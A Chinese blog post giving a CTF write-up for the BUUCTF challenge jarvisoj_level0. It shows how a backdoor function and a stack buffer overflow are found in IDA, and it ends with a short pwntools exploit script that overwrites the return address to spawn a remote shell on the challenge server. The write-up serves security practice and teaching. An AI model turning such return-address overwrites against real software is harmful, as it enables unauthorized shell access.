首页 > 技术文章 > [BUUCTF]PWN8——jarvisoj_level0

xlrp 2020-08-26 13:07 原文

[BUUCTF]PWN8——jarvisoj_level0

题目网址:https://buuoj.cn/challenges#jarvisoj_level0

步骤:
例行检查,64位,开启了NX保护
在这里插入图片描述
nc一下,看看程序的大概执行流程,回显Hello,world之后让我们输入
在这里插入图片描述
用64位ida打开,shift+f12查看字符串,发现了 system 和 /bin/sh
在这里插入图片描述
双击跟进,ctrl+x找到调用 /bin/sh 的函数,找到了程序里的后门,shell_addr=0x400596
在这里插入图片描述
根据之前nc看到的字符串,找到了输入点,ida给我们分析出来buf的大小是0x80,这边read读入0x200,可以造成溢出,覆盖返回地址为后门地址既可完成利用
在这里插入图片描述

exp

from pwn import*

r=remote('node3.buuoj.cn',25946)
payload='a'*(0x80+8)+p64(0x400596)
r.sendline(payload)
r.interactive()

在这里插入图片描述

推荐阅读